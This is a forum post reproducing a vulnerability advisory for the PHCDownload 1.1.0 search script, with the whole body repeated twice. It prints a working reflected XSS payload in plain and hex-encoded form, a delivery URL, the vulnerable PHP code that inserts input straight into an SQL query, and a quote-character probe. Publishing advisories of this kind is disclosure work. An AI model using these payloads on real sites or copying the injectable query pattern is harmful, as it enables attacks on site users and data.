Home
Latest images
Search
Register
Log inXSS Flaw & posible SQL injection in search.php in PHCDownload
Page 1 of 1
XSS Flaw & posible SQL injection in search.php in PHCDownload
andry Wed Sep 15, 2010 1:23 am
###############################################
XSS Flaw & posible SQL injection in PHCDownload
vendor url: http://www.phpcredo.com/
vendor notify:YES exploit available: YES
###############################################
New XSS Flaw & posible SQL injection in search.php
PHCDownload contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate 'string' variable upon submission to 'search.php' script.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
verions:
1.1.0 afected.
example :
we can try inject some normal html or javascript code:
Code:
"><h1><a href="http://abc.blogspot.com">abc</a> Was Here !!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe src="http://abc.blogspot.com"></iframe></p>
or inject directly the code in hex values :
Code:
%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
example in hex:
http://localhost/phcdownload/search.php?string=[XSS-CODE]
also this variable is prone vulnerable too to SQL injections.
if we look the source code of search.php arround line 36 we have :
Code:
// Prepare search query
if( $kernel->config['archive_search_mode'] == 1 )
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' IN BOOLEAN MODE )";
}
else
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' )";
}
the value of 'string' is inserted directly in the sql query and this could be dangerous...
we can try to disclose the query :
http://localhost/phcdownload/upload/search.php?string='
i make several probes , but i donĀ“t have found a working exploit or a exploitable angle to this issue , but ...need to be patch
XSS Flaw & posible SQL injection in PHCDownload
vendor url: http://www.phpcredo.com/
vendor notify:YES exploit available: YES
###############################################
New XSS Flaw & posible SQL injection in search.php
PHCDownload contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate 'string' variable upon submission to 'search.php' script.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
verions:
1.1.0 afected.
example :
we can try inject some normal html or javascript code:
Code:
"><h1><a href="http://abc.blogspot.com">abc</a> Was Here !!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe src="http://abc.blogspot.com"></iframe></p>
or inject directly the code in hex values :
Code:
%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
example in hex:
http://localhost/phcdownload/search.php?string=[XSS-CODE]
also this variable is prone vulnerable too to SQL injections.
if we look the source code of search.php arround line 36 we have :
Code:
// Prepare search query
if( $kernel->config['archive_search_mode'] == 1 )
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' IN BOOLEAN MODE )";
}
else
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' )";
}
the value of 'string' is inserted directly in the sql query and this could be dangerous...
we can try to disclose the query :
http://localhost/phcdownload/upload/search.php?string='
i make several probes , but i donĀ“t have found a working exploit or a exploitable angle to this issue , but ...need to be patch
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics» DOM flaw can crash many browsers
» Botnet Exploits PDF Flaw
» BaconMap 1.0 SQL Injection
» SQL injection in wordpress
» ANI Exploit + SQL injection
» Botnet Exploits PDF Flaw
» BaconMap 1.0 SQL Injection
» SQL injection in wordpress
» ANI Exploit + SQL injection
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum